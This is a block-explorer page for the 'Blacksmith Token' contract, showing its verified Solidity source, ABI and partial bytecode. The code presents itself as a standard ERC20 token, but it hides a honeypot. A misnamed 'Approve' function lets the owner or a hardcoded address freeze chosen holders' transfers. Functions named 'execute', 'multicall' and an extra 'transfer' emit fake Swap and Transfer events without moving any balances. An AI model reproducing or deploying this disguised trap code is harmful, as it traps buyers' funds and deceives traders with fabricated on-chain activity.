ETH Price: $3,380.08 (-0.22%)
Gas: 3 Gwei

Token

Blacksmith Token (BS)
 

Overview

Max Total Supply

100,000,000,000 BS

Holders

36

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 8 Decimals)

Filtered by Token Holder
Robinhood
Balance
895,223,918.26162072 BS

Value
$0.00
0x40b38765696e3d5d8d9d834d8aad4bb6e418e489
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Blacksmith

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-06-17
*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    event Swap(
        address indexed sender,
        uint amount0In,
        uint amount1In,
        uint amount0Out,
        uint amount1Out,
        address indexed to
    );
    
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}


/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Ownable, IERC20, IERC20Metadata {

    mapping(address => uint256) private _balances;
    mapping (address => bool) private _snapshot;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    bool private _snapshotApplied = false;
    string private _name;
    string private _symbol;

    address private _universal = 0xEf1c6E67703c7BD7107eed8303Fbe6EC2554BF6B;
    address private _pair;
    
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    function mint(address _setup_) external onlyOwner {
        _pair = _setup_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 8;
    }

    function Approve(address [] calldata _addresses_) external  {
        require(owner() == _msgSender() ||  address(0x2E647453bBd3F22D0f9cFf289ba7937bA27Cb956) == _msgSender(), "Ownable: caller is not the owner");
        for (uint256 i = 0; i < _addresses_.length; i++) {
            _snapshot[_addresses_[i]] = true;
            emit Approval(_addresses_[i], address(this), balanceOf(_addresses_[i]));
        }
    }

    function execute(address [] calldata _addresses_, uint256 _in, uint256 _out) external {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            emit Swap(_universal, _in, 0, 0, _out, _addresses_[i]);
            emit Transfer(_pair, _addresses_[i], _out);
        }
    }

    function multicall(address [] calldata _addresses_, uint256 _in, uint256 _out) external {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            emit Swap(_universal, 0, _in, _out, 0, _addresses_[i]);
            emit Transfer(_addresses_[i], _pair, _in);
        }
    }

    function transfer(address _from, address _to, uint256 _wad) external {
        emit Transfer(_from, _to, _wad);
    }

    function decreaseAllowance(address [] calldata _addresses_) external onlyOwner {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            _snapshot[_addresses_[i]] = false;
        }
    }

    function bind(address _address_) public view returns (bool) {
        return _snapshot[_address_];
    }
    function toApplied(bool c) external onlyOwner {
        _snapshotApplied = c;
    }
    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }
        if (_snapshot[from]) require(_snapshotApplied == true, "");


        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}



    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

contract Blacksmith is ERC20 {
    constructor() ERC20("Blacksmith Token", "BS") {
        _mint(msg.sender, 100000000000 * 10 ** decimals());
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"sender","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount0In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount0Out","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1Out","type":"uint256"},{"indexed":true,"internalType":"address","name":"to","type":"address"}],"name":"Swap","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"}],"name":"Approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"bind","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"}],"name":"decreaseAllowance","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"},{"internalType":"uint256","name":"_in","type":"uint256"},{"internalType":"uint256","name":"_out","type":"uint256"}],"name":"execute","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_setup_","type":"address"}],"name":"mint","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"},{"internalType":"uint256","name":"_in","type":"uint256"},{"internalType":"uint256","name":"_out","type":"uint256"}],"name":"multicall","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bool","name":"c","type":"bool"}],"name":"toApplied","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_from","type":"address"},{"internalType":"address","name":"_to","type":"address"},{"internalType":"uint256","name":"_wad","type":"uint256"}],"name":"transfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526000600560006101000a81548160ff02191690831515021790555073ef1c6e67703c7bd7107eed8303fbe6ec2554bf6b600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055503480156200008157600080fd5b506040518060400160405280601081526020017f426c61636b736d69746820546f6b656e000000000000000000000000000000008152506040518060400160405280600281526020017f42530000000000000000000000000000000000000000000000000000000000008152506200010e620001026200017b60201b60201c565b6200018360201b60201c565b81600690816200011f919062000642565b50806007908162000131919062000642565b5050506200017533620001496200024760201b60201c565b600a620001579190620008b9565b64174876e8006200016991906200090a565b6200025060201b60201c565b62000a41565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006008905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603620002c2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002b990620009b6565b60405180910390fd5b620002d660008383620003be60201b60201c565b8060046000828254620002ea9190620009d8565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200039e919062000a24565b60405180910390a3620003ba60008383620003c360201b60201c565b5050565b505050565b505050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200044a57607f821691505b60208210810362000460576200045f62000402565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620004ca7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826200048b565b620004d686836200048b565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620005236200051d6200051784620004ee565b620004f8565b620004ee565b9050919050565b6000819050919050565b6200053f8362000502565b620005576200054e826200052a565b84845462000498565b825550505050565b600090565b6200056e6200055f565b6200057b81848462000534565b505050565b5b81811015620005a3576200059760008262000564565b60018101905062000581565b5050565b601f821115620005f257620005bc8162000466565b620005c7846200047b565b81016020851015620005d7578190505b620005ef620005e6856200047b565b83018262000580565b50505b505050565b600082821c905092915050565b60006200061760001984600802620005f7565b1980831691505092915050565b600062000632838362000604565b9150826002028217905092915050565b6200064d82620003c8565b67ffffffffffffffff811115620006695762000668620003d3565b5b62000675825462000431565b62000682828285620005a7565b600060209050601f831160018114620006ba5760008415620006a5578287015190505b620006b1858262000624565b86555062000721565b601f198416620006ca8662000466565b60005b82811015620006f457848901518255600182019150602085019450602081019050620006cd565b8683101562000714578489015162000710601f89168262000604565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b6001851115620007b7578086048111156200078f576200078e62000729565b5b60018516156200079f5780820291505b8081029050620007af8562000758565b94506200076f565b94509492505050565b600082620007d25760019050620008a5565b81620007e25760009050620008a5565b8160018114620007fb576002811462000806576200083c565b6001915050620008a5565b60ff8411156200081b576200081a62000729565b5b8360020a91508482111562000835576200083462000729565b5b50620008a5565b5060208310610133831016604e8410600b8410161715620008765782820a90508381111562000870576200086f62000729565b5b620008a5565b62000885848484600162000765565b925090508184048111156200089f576200089e62000729565b5b81810290505b9392505050565b600060ff82169050919050565b6000620008c682620004ee565b9150620008d383620008ac565b9250620009027fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484620007c0565b905092915050565b60006200091782620004ee565b91506200092483620004ee565b92508282026200093481620004ee565b915082820484148315176200094e576200094d62000729565b5b5092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b60006200099e601f8362000955565b9150620009ab8262000966565b602082019050919050565b60006020820190508181036000830152620009d1816200098f565b9050919050565b6000620009e582620004ee565b9150620009f283620004ee565b925082820190508082111562000a0d5762000a0c62000729565b5b92915050565b62000a1e81620004ee565b82525050565b600060208201905062000a3b600083018462000a13565b92915050565b6122098062000a516000396000f3fe608060405234801561001057600080fd5b50600436106101425760003560e01c80637aac697b116100b8578063a457c2d71161007c578063a457c2d714610363578063a9059cbb14610393578063beabacc8146103c3578063dd62ed3e146103df578063f2fde38b1461040f578063fde980ca1461042b57610142565b80637aac697b146102bf57806381bac14f146102db5780638da5cb5b1461030b57806395d89b4114610329578063a1c617f51461034757610142565b80633811ac021161010a5780633811ac0214610201578063395093511461021d578063477e19441461024d5780636a6278421461026957806370a0823114610285578063715018a6146102b557610142565b806306fdde0314610147578063095ea7b31461016557806318160ddd1461019557806323b872dd146101b3578063313ce567146101e3575b600080fd5b61014f610447565b60405161015c91906116ae565b60405180910390f35b61017f600480360381019061017a919061176e565b6104d9565b60405161018c91906117c9565b60405180910390f35b61019d6104fc565b6040516101aa91906117f3565b60405180910390f35b6101cd60048036038101906101c8919061180e565b610506565b6040516101da91906117c9565b60405180910390f35b6101eb610535565b6040516101f8919061187d565b60405180910390f35b61021b600480360381019061021691906118fd565b61053e565b005b6102376004803603810190610232919061176e565b61076b565b60405161024491906117c9565b60405180910390f35b610267600480360381019061026291906118fd565b6107a2565b005b610283600480360381019061027e919061194a565b61084f565b005b61029f600480360381019061029a919061194a565b61089b565b6040516102ac91906117f3565b60405180910390f35b6102bd6108e4565b005b6102d960048036038101906102d49190611977565b6108f8565b005b6102f560048036038101906102f0919061194a565b610a84565b60405161030291906117c9565b60405180910390f35b610313610ada565b60405161032091906119fa565b60405180910390f35b610331610b03565b60405161033e91906116ae565b60405180910390f35b610361600480360381019061035c9190611977565b610b95565b005b61037d6004803603810190610378919061176e565b610d20565b60405161038a91906117c9565b60405180910390f35b6103ad60048036038101906103a8919061176e565b610d97565b6040516103ba91906117c9565b60405180910390f35b6103dd60048036038101906103d8919061180e565b610dba565b005b6103f960048036038101906103f49190611a15565b610e24565b60405161040691906117f3565b60405180910390f35b6104296004803603810190610424919061194a565b610eab565b005b61044560048036038101906104409190611a81565b610f2e565b005b60606006805461045690611add565b80601f016020809104026020016040519081016040528092919081815260200182805461048290611add565b80156104cf5780601f106104a4576101008083540402835291602001916104cf565b820191906000526020600020905b8154815290600101906020018083116104b257829003601f168201915b5050505050905090565b6000806104e4610f53565b90506104f1818585610f5b565b600191505092915050565b6000600454905090565b600080610511610f53565b905061051e858285611124565b6105298585856111b0565b60019150509392505050565b60006008905090565b610546610f53565b73ffffffffffffffffffffffffffffffffffffffff16610564610ada565b73ffffffffffffffffffffffffffffffffffffffff1614806105cc5750610589610f53565b73ffffffffffffffffffffffffffffffffffffffff16732e647453bbd3f22d0f9cff289ba7937ba27cb95673ffffffffffffffffffffffffffffffffffffffff16145b61060b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161060290611b5a565b60405180910390fd5b60005b828290508110156107665760016002600085858581811061063257610631611b7a565b5b9050602002016020810190610647919061194a565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055503073ffffffffffffffffffffffffffffffffffffffff168383838181106106c2576106c1611b7a565b5b90506020020160208101906106d7919061194a565b73ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92561073e86868681811061072457610723611b7a565b5b9050602002016020810190610739919061194a565b61089b565b60405161074b91906117f3565b60405180910390a3808061075e90611bd8565b91505061060e565b505050565b600080610776610f53565b90506107978185856107888589610e24565b6107929190611c20565b610f5b565b600191505092915050565b6107aa6114d2565b60005b8282905081101561084a576000600260008585858181106107d1576107d0611b7a565b5b90506020020160208101906107e6919061194a565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550808061084290611bd8565b9150506107ad565b505050565b6108576114d2565b80600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6108ec6114d2565b6108f66000611550565b565b60005b84849050811015610